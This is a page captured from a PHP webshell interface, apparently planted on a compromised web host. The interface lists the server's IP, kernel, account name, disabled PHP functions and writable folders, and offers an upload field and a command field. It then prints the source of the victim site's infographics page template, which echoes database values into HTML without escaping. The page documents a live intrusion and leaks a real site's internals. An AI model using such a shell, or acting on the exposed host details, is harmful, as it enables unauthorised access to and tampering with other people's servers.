403Webshell
Server IP : 94.136.191.34  /  Your IP : 216.73.216.25
Web Server : Apache
System : Linux hostpanel.netbiz.in 5.15.0-130-generic #140-Ubuntu SMP Wed Dec 18 17:59:53 UTC 2024 x86_64
User : omkar.com_6nnuz6y629h ( 10087)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system,proc_open,popen
MySQL : OFF |  cURL : ON |  WGET : OFF |  Perl : OFF |  Python : OFF |  Sudo : OFF |  Pkexec : OFF
Directory :  /var/www/vhosts/omkar.com/httpdocs/application/views/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /var/www/vhosts/omkar.com/httpdocs/application/views/infographics_main.php
<!DOCTYPE html>
<html lang="en">
<head>
	<title><?php echo $page_info->title;?></title>
	<meta name="description" content="<?php echo $page_info->meta_description;?>" />
	<meta name="keywords" content="<?php echo $page_info->meta_keywords;?>" />
	<?php $this->load->view('header'); ?>
</head>
<body>	
<!-- Google Tag Manager (noscript) -->
<noscript>
<iframe src="https://www.googletagmanager.com/ns.html?id=GTM-T3BPP5W" height="0" width="0" style="display:none;visibility:hidden">
</iframe>
</noscript>
<!-- End Google Tag Manager (noscript) -->
	<!-- structured map data -->
	<?php echo $page_info->structured_map_data;?>

<!-- structured map data -->
	<div id="wrapper" class="aos-all">
		<?php
		$details=$details[0];
		$data1['act'] = $page_active;
		// $data1['project_list'] = $project_list;
		// print_r($project_list);die;
		$this->load->view('navigation', $data1); ?>
		 
		<?php /*
		<section class="infoListingBanner">
			<div class="container">
				<div class="row row-eq-height">
					<div class="col-md-6 infobannertxt">
						<h4 data-aos="fade-up">Lorem ipsum dolor sit amet</h4>
						<p data-aos="fade-up" data-aos-delay="100">Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod
						tempor incididunt ut labore et dolore magna aliqua.</p>
					</div>
					<div class="col-md-6">
						<img src="<?php echo base_url(); ?>assets/images/bannerinfographic.jpg" alt="">
					</div>
				</div>
			</div>
		</section>
		*/ ?>
		<section class="infoListingWprMain">
			<div class="container">
				<!-- infographic section info start here -->
				<div class="row">
					<div class="col-md-12">
						<h2 data-aos="fade-up" class="aos-init aos-animate"><?php echo $details['title'];?></h2>
						<p><?php echo $details['description'];?>.</p>
						<div class="listMonth">Month: <strong><?php echo date('F Y', strtotime($details['publish_date']));?></strong></div>
					</div>
				</div>
				<hr>
				<!-- infographic section info end here -->
				<!-- image section start here -->
				<div class="row">
					<div class="col-md-8 offset-md-2">
						
					<?php if($details['image'] !=''){ ?>
					<div class="infoImgView">
						<img src="<?php echo base_url(); ?>uploads/infographic/image/<?php echo $details['image'];?>" alt="">
					</div>
					<?php } ?>
					<!-- image section end here -->

					<!-- Youtube video section start here -->
					<?php if($details['video'] !=''){
	                           $url = $details['video'];
	                           $url = explode('/', $url);
	                           $url_c = count($url)-1;
	                           $video_name = $url[$url_c];
	                ?>
					<div class="infoVidView videoThumbYt">
						<iframe width="100%" src="<?php echo $details['video']?>" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
						<img width="100%" src="https://img.youtube.com/vi/<?php echo $video_name; ?>/0.jpg" alt="Click to Play" title="Click to Play">
					</div>
					<?php } ?>
					<!-- Youtube video section end here -->

					<!-- video section start here -->
					<?php if($details['video_file'] !=''){ ?>
					<div class="infoVidView">
						<!-- video thumbnail -->
						<div style="background-image: url('<?php echo base_url(); ?>uploads/infographic/video_image/<?php echo $details['video_image'];?>')"  class="videoThumb"><a href="javascript:void(0);" class="playIcon"></a></div>
						<!-- main video -->
						<video autobuffer autoloop loop controls>
							<source src="<?php echo base_url(); ?>uploads/infographic/video/<?php echo $details['video_file'];?>" type="video/mp4">
						</video>
					</div>
					<?php } ?>
					<!-- video section end here -->
					</div>
				</div>
			</div>
		</section>

		<?php $this->load->view('sub_footer'); ?>
	</div>
<?php $this->load->view('footer'); ?>

<script type="text/javascript">
	(function(){
		$('.playIcon').on('click',function(){
			$('.videoThumb').fadeOut();
			$('.infoVidView video').get(0).play();
		});
	})


	();
</script>
</body>
</html>





Youez - 2016 - github.com/yon3zu
LinuXploit